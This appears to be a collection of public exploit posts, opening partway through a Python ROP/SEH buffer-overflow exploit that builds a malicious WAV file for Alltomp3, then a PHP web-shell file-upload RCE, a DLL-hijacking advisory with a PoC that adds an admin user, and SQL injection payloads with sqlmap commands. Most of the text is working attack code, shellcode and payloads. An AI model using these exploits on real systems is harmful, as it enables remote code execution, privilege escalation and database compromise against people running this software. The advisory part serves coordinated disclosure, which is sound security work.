; (1 found) ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll] ####################### 8. Set hHEAP ########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ####################### 9. Go to HeapAlloc ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found) ROP += struct.pack("<I", 0xfffffdcc) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found) # when heap create finishes, eax will have hHeap ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ####################### 10. Get Stack Pointer to point to DDDD ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found) ROP += struct.pack("<I", 0xfffffd5c) ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*3 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found) ROP += b"A" * 4 # ecx points to DDDD ####################### 12. Set RET ########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ROP += b"A"*0x10 ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll] ####################### 13. DESTIN ########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]* ####################### 14. SOURCE ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found) ROP += struct.pack("<I", 0x000000a0) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ####################### 15. GOTO _memcpy_s ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found) ROP += struct.pack("<I", 0xfffffc94) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found) ####################### SHELLCODE ########################### shellcode = b"\xcc" * 400 real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0" ####################### CONSTRUCT ########################### SIZE = 500 start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode)) start_of_padding += shellcode start_of_padding += EXE SIZE = 1500 RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET #INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found) INT = struct.pack("I", 0x1003c6aa)*2 rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172 rest_of_payload += b"\x90" * 100 rest_of_payload += real_shellcode rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload)) payload = junk + SEH + start_of_padding + rest_of_payload REST = b"\x44" * (size-len(payload)) payload += REST file = open("1.wav", "wb") file.write(payload) file.close() </code></pre>

<pre><code># Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload # Date: 2/11/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://codeastro.com # Version: V1.0 # Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3 ## Description ## This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server . ----------------------------------------------------------------------------------------------------------------------- ## Simple RCE Payload : ## <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system_payload($_GET['cmd']); } ?> </pre> </body> </html> ----------------------------------------------------------------------------------------------------------------------- ## Steps to Reproduce ## 1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off . 2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php 3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . 4- Change The Filename extension into avatar.png , after save the RCE PHP Script . 5- Click Chose File From User Image Section Then Upload Your avatar.png file . 6- Click Register Then Back to Burp Suite Proxy Tab : 7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png" Content-Type: image/png . 8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button . 9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password . 10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .! ----------------------------------------------------------------------------------------------------------------------- ## Burp Request : ## POST /realestate/register.php HTTP/1.1 Host: localhost Content-Length: 1100 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/realestate/register.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="name" johnhamosh ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="email" rasu1l@in.com ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="phone" +199988764 ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="pass" <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="utype" user ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="uimage"; filename="avatar.php" Content-Type: image/png <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="reg" Register ------WebKitFormBoundarypgW90eleiRxRzcEK-- ----------------------------------------------------------------------------------------------------------------------- ## PoC Simple RCE Through This Vulnerability : ## Directory of C:\xampp\htdocs\realestate\admin\user .. 02/11/2024 08:09 PM 315 avatar.php 02/11/2024 08:04 PM 315 avatar.png 02/11/2024 06:54 PM 9,376 avatarm2-min.jpg 02/11/2024 06:54 PM 13,186 avatarm7-min.jpg 02/11/2024 07:47 PM 1,814 avatars.php 02/11/2024 06:54 PM 1,313 gr7.png 02/11/2024 07:36 PM 28 poc.php ----------------------------------------------------------------------------------------------------------------------- ## Video PoC : ## 1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4 2- https://gofile.io/d/AEWEgI ----------------------------------------------------------------------------------------------------------------------- Greetz ! </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240226-0 > ======================================================================= title: Local Privilege Escalation via DLL Hijacking product: Qognify VMS Client Viewer vulnerable version: >=7.1 fixed version: see solution CVE number: CVE-2023-49114 impact: medium homepage: https://www.qognify.com/ found: 2023-11-23 by: Sandro Einfeldt (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Qognify, part of Hexagon, helps customers minimize the impact of security, safety and operational incidents. Qognify’s comprehensive portfolio of video management software and enterprise incident management solutions serve thousands of customers around the world in manufacturing, transportation, retail, education, finance, logistics, corrections, critical infrastructure and government." Source: https://www.qognify.com/about-us/ Business recommendation: ------------------------ The vendor provides a hardening guide for their customers which should be implemented to ensure that no DLLs can be preloaded. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114) The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL Hijacking. The application tries to load multiple DLL files from the DLL search order without success. At least one of the missing DLL files can be hijacked. This might allow malicious actors with low privileges on a Windows system to escalate privileges if some specific pre-conditions are met: 1. The attacker can drop a DLL file in a folder within the DLL search order (This circumstance is based on a configuration issue in the Windows file system permissions and is beyond the attacker's control.). 2. A high privileged user starts the VMS_Client.exe FAT client application. Proof of concept: ----------------- 1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114) For successful exploitation, the attacker needs write-access to one of the following directories in the DLL search order: 1. The directory from which the application loaded 2. The system directory 3. The 16-bit system directory 4. The Windows directory 5. The current working directory (CWD) 6. The directories that are listed in the PATH environment variable The attacker can use the following malicious C-code to create a POC exploit: #include <windows.h> BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ if (dwReason == DLL_PROCESS_ATTACH){ system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y"); system("cmd.exe /C net localgroup administrators secconsult /add"); ExitProcess(0); } return TRUE; } The following command can be used to compile the code and create the DLL file: x86_64-w64-mingw32-gcc CRYPTBASE.c -shared -o CRYPTBASE.dll Next, the CRYPTBASE.dll file has to be dropped into one of the previously mentioned folders of the DLL search order. If a user with local administrative permissions starts the VMS Client/Viewer FAT client application, CRYPTBASE.dll gets loaded and the malicious code gets executed with high privileges. In this POC, the user 'secconsult' is created and added to the group of local administrators. By following this approach, the attacker is able to escalate privileges. Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 7.2 According to the vendor, all versions starting from 7.1 are affected. Users should implement the hardening guide. Vendor contact timeline: ------------------------ 2024-01-17: Contacting vendor through supportCY@qognify.com 2024-01-17: Very quick vendor support response, asking for general information about the vulnerability, to be able to assign the correct internal team. 2024-01-17: Sending vendor short overview about the vulnerability. 2024-01-17: Vendor support forwards the information internally, we can submit the advisory unencrypted to the support email address. 2024-01-17: Submitting advisory. 2024-01-17: Vendor support acknowledges receipt of advisory. 2024-01-22: Responsible person at vendor contacts us, scheduling a meeting. 2024-01-22: Vendor support follows up if responsible person contacted us, closes support ticket. 2024-01-23: Meeting with vendor. 2024-02-09: Vendor response with detailed information regarding updated hardening guide. 2024-02-13: Follow-up questions regarding hardening guide & availability, affected version number, sending new advisory draft. 2024-02-21: Vendor: Sends link to PartnerWeb portal regarding guideline, confirms affected versions (>=7.1). 2024-02-22: Updating security advisory with new information, scheduling release for 26th February. 2024-02-26: Coordinated release of advisory. Solution: --------- The vendor provides a hardening guide for their customers which should be implemented to ensure that no DLLs can be preloaded. It can be found in the PartnerWeb portal of Qognify linked from here: https://www.qognify.com/support-training/guides-documentation/ https://partner.qognify.com/qognify-vms/software-documentation/technical-guides/ Workaround: ----------- Implement the hardening guide. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Sandro Einfeldt / @2024 </code></pre>

<pre><code># Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection # Date: 27 December 2023 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip # Version: v1.0 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(/php-acrss/admin/user/manage_user.php): <?php if(isset($_GET['id'])){ $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' "); foreach($user->fetch_array() as $k =>$v){ $meta[$k] = $v; } } ?> -> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs --- Source Code(/php-acrss/classes/Master.php): function delete_inquiry(){ extract($_POST); $del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'"); if($del){ $resp['status'] = 'success'; $this->settings->set_flashdata('success'," Inquiry successfully deleted."); }else{ $resp['status'] = 'failed'; $resp['error'] = $this->conn->error; } return json_encode($resp); } -> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch --- Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw --- Source Code(/php-acrss/classes/Users.php): $qry = $this->conn->query("UPDATE users set $data where id = {$id}"); if($qry){ $this->settings->set_flashdata('success','User Details successfully updated.'); foreach($_POST as $k => $v){ if($k != 'id'){ if(!empty($data)) $data .=" , "; if($this->settings->userdata('id') == $id) $this->settings->set_userdata($k,$v); } } POST /php-acrss/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 943 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 sec-ch-ua-platform: "macOS" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77 Connection: close ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" 9 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- -> sqlmap -r ~/Documents/POST-localhost.txt --batch --- Parameter: MULTIPART id ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" (SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END)) ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" 9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO) ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- --- </code></pre>